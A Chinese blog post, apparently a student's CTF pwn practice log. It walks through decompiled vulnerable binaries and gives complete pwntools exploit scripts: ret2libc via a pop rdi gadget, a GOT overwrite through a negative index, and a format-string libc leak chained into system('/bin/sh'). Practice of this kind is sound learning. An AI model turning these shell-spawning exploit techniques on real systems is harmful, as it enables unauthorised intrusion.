pwn暑假训练(十) emem这次的测验自己还是太菜

最新推荐文章于 2022-03-08 21:00:00 发布
最新推荐文章于 2022-03-08 21:00:00 发布
阅读量754 收藏
点赞数
分类专栏: 学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/99583673
版权

记一下昨天的测验我直接讲我没过的题目
有system函数没有’bin/sh’只开了nx但gadget少的可怜题目直接给了libc那就不用想了直接找偏移…我同学给的libc偏移不对…

Gadgets information
============================================================
0x00000000004006d2 : pop rbp ; ret
0x00000000004006d1 : pop rbx ; pop rbp ; ret
0x0000000000400585 : ret
0x0000000000400735 : ret 0xbdb8

Unique gadgets found: 4

这是我查的gadget没有传参的寄存器然后最后还是用的我Ubuntu的libc才解决…

ssize_t vulnerable_function()
{
  char buf; // [rsp+0h] [rbp-80h]

  return read(0, &buf, 0x200uLL);
}

这是漏洞函数
exp:

from pwn import *
p=process('./pwn3')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
print hex(libc.symbols['system'])
pop_rdi=0x021102
data=p.recvuntil('\n',drop=True)

system_addr=int(data,16)

libcbase=system_addr-libc.symbols['system']

bin_sh=libcbase+int(libc.search('/bin/sh').next())
pop_rdi_base=libcbase+pop_rdi
offset=136
payload='a'*offset
payload+=p64(pop_rdi+libcbase)
payload+=p64(bin_sh)
payload+=p64(system_addr)
#payload+=p64(system_addr)
#payload+=p64(0)
#payload+=p64(bin_sh)
#gdb.attach(p,'')
p.recvuntil('Hello, World')
p.sendline(payload)
p.interactive()

pwn4
也是gadget很少几乎和上一题一样的没啥区别
pwn5
这道题的主要代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setbuf(_bss_start, 0LL);
  puts("now you can input your idx");
  v4 = 0;
  __isoc99_scanf("%d", &v4);
  read(0, (void *)(v4 + 6295680LL), 0x30uLL);
  puts("bye bye");
  return 0;
}

发现idx和read的基参数是写在bss的buf段的当时我想到了填负数但是没想到还可以got表覆盖…郁闷了
exp给上

from pwn import *
p=process('./pwn5')
p.recvuntil('now you can input your idx')
p.sendline('-104')
system_addr=0x0400716
payload=p64(system_addr)
p.sendline(payload)
p.interactive()

最后一个我今天做的bugku的pwn5
也是一道泄露libc的题目但是我有一点问题就是看不出__libc_main_start 在libc中的偏移大佬说使用gdb调出来但我没有调出来整个思路就是先是格式化字符串泄露一个libc函数确定libc然后算出基址system,‘、/bin/sh’的地址然后用gadget就可以getshell了

nt __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+0h] [rbp-20h]

  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  memset(&s, 0, 0x20uLL);
  puts(&::s);
  read(0, &s, 8uLL);
  printf(&s, &s);#这里就有格式化字符串漏洞
  puts(&s);
  puts(&s);
  puts(&s);
  puts(&byte_400978);
  sleep(1u);
  puts(asc_400998);
  read(0, &s, 0x40uLL);
  if ( !strstr(&s, &needle) || !strstr(&s, &byte_4009BA) )#这个到内存里面看字符串就行了
  {
    puts(&byte_4009C8);
    exit(0);
  }
  puts(&byte_4009F8);
  return 0;
}

上exp:

#coding:utf-8
from pwn import *
#from LibcSearcher import LibcSearcher
libc=ELF('./libc6_2.23-0ubuntu10_amd64.so')
p=process('./human')
#p=remote('114.116.54.89',10005)
#payload='%11$p'
pop_rdi=0x0400933
p.recvuntil('\n\n')
p.sendline('%11$p')
libc_start_main_ret = int(p.recvuntil('\n',drop=True)[2:],16)
offset_system=libc.symbols['system']
offset_bin_sh=libc.search('/bin/sh').next()
offset___libc_start_main_ret = libc.symbols['__libc_start_main']
libcbase=libc_start_main_ret - 0x544
system_addr=libcbase+0x45390
bin_sh=libcbase+0x18cd57



payload = 'a鸽子' + 'a'+'真香' + '\x00'
#payload += '真香' + '\x00'
payload=payload.ljust(0x20,'a')
payload+='b'*8
payload+=p64(pop_rdi)
payload+=p64(bin_sh)
payload+=p64(system_addr)
p.recvuntil('?\n')
p.sendline(payload)

p.interactive()
doudoudedi
关注
专栏目录
BUUCTF-PWN-pwnable_asm-Sandbox
Rt1Text的博客
07-21 296
检查允许的系统调用orw是允许的,用open()打开flag文件,通过read()和write()读取并输出。
bugku pwn5(格式化字符串漏洞)
weixin_45097188的博客
10-09 1477
检查程序开启了哪些保护及位数 没有开始栈保护 读程序 发现没有system和bin/sh两个后门,需要返回到libc,但是有__libc_start_main函数,可以通过这个函数计算libc的基地址。 libc_start_main的偏移=0x28/8+6=11 思路:栈上格式化漏洞配合栈溢出漏洞,首先利用格式化泄漏libc地址,然后栈溢出执行system(’/bin/sh’) 利用pwn4...
glibc2.27下堆题绕过沙箱
qq_45595732的博客
03-27 663
这里因为重点在于沙箱的绕过,漏洞就拿了一个最简单的uaf做演示。 最主要的是setcontext这个函数,可以看到setcontext+53之后控制了大量的寄存器(可以看作就是一个SigreturnFrame),寻址都是[rdi+x]的方式,那么我们假如劫持了free_hook为setcontext+53,此时rdi刚好是堆块内容的地址,我们可以直接放个SigreturnFrame进去,之后利用的话就按个人喜好了。我写了三种方式,本质都是orw。 1.mprotect+shellcode 2.rop(rop
[XCTF-pwn] 25_easyfmt
weixin_52640415的博客
03-08 472
格式化字符串漏洞,got.exit劫持,got.printf劫持 这题比上题要简单,先修改got.exit为main进入循环并漏洞libc地址,再将printf改为system,再输入/bin/sh int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[264]; // [rsp+10h] [rbp-110h] BYREF unsigned __int64 v4; // [r
pwn题中 setbuf的用处
Maxmalloc的博客
10-14 2920
在我们遇到的每一个需要输入输出的pwn题中一般都会有下面这几条语句 setvbuf(stdin, 0LL, 2, 0LL); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stderr, 0LL, 2, 0LL); 直到今天才彻底搞明白这三句话的作用。 因为我们搭建pwn题一般都是用socat进行端口转发,pwn题搭建详情 但是socat不是一次写一行而...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN测试题目
07-18
在信息安全领域,PWN(全称“Pwn all the things”)是一种常见且重要的技能,主要涉及利用软件漏洞来获取对系统的控制权。CTF(Capture The Flag)是一种网络安全竞赛,其中PWN类题目通常是最具挑战性的部分,旨在...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
buuctf pwn ubuntu20的自己搭建运行环境
最新发布
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
baby_pwn ciscn 2019 第二届全国大学生信息安全竞赛
04-22
【标题】"baby_pwn ciscn 2019 第二届全国大学生信息安全竞赛" 涉及的是一个信息安全竞赛中的题目,该比赛可能是针对参赛者在网络安全领域,特别是"pwn"类问题解决能力的挑战。"pwn"在黑客术语中通常指的是攻破或...
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1650
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
CTF-浅尝64位栈溢出PWN
热门推荐
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
pwn题解第一道
bluestar628的博客
03-24 1832
今天听说了一个网站pwnable.kr。很适合初学者,就试着做了一道题目。 第一道题目,按照网页上给的链接,使用putty链接工具联入。 输入ls命令查看文件内容。 很开心的看到了flag文件,于是直接打开,果然不出所料,我是没有权限打开的。然后查看了一下fd.c的代码。 #include #include #include char buf[32]; int main(in
浅析栈溢出遇到的坑及绕过技巧
蚁景网安学院
12-25 948
0x00前言对于刚开始入门pwn的萌新来说可能会遇到一些坑,这里我就来总结一下我之前做栈溢出的时候遇到的两种坑以及绕过技巧,具体我会通过例题来讲解,希望对此时正在入门的pwn的萌新能带来...
pwnable.kr】cmd1 - putenv() strstr() bypass
think_ycx的专栏
10-09 679
cmd1 - 1 pt Mommy! what is PATH environment in Linux? ssh cmd1@pwnable.kr -p2222 (pw:guest) 登陆服务器之后,cmd1有cmd1_pwn的group权限,可以读flag。 cmd1@ubuntu:~$ ls -l total 20 -r-xr-sr-x 1 root cmd1_pwn 8513 ...
CTF-Pwn-[BJDCTF 2nd]test
归子莫的博客
05-06 1698
CTF-Pwn-[BJDCTF 2nd]test 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]test 这个题目需要使用ssh连接 Username: ctf P...
2019.7.24 64位程序libc泄露 x64_3
DSR446的博客
08-17 593
1.这是程序,程序中没有system函数也没有/bin/sh字符串,但是函数中有read函数。我们有一下几种解法。①我们用LibcSearcher这个模块进行解题②打本地的时候,我们可以在gdb中,用vmmap指令来找到动态链接库的绝对路径,然后用elf = ELF(‘绝对路径’),来算偏移③我们也可以用ldd指令找到相对路径,然后拷贝到当前路径,然后用ipython,用elf = ELF(‘li...
攻防世界pwn之新手练习区
bahuishi9641的博客
07-30 1437
0x00 get_shell 题目描述:运行就能拿到shell呢,真的 from pwn import * io = remote('111.198.29.45','36389') io.interactive() 0x01 CGfsb 题目描述:菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 1.基本信息: Arch: i386-32-little ...
IDA Pro: C++逆向之容器vector篇入门
追求卓越
06-20 4653
IDA Pro下载: https://download.csdn.net/download/larry_zeng1/11122054 前言:说实话,我自己也不会c++的逆向。然后,现在太多的题目是c++的逆向了,一上来就是一堆容器,搞得我不得不去补补c++逆向部分的知识了,我这篇文章以西湖论剑的easyCpp为例,希望能给那些跟我一样是c++逆向的新手的朋友们一点启发。下面我就开始我的抛...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值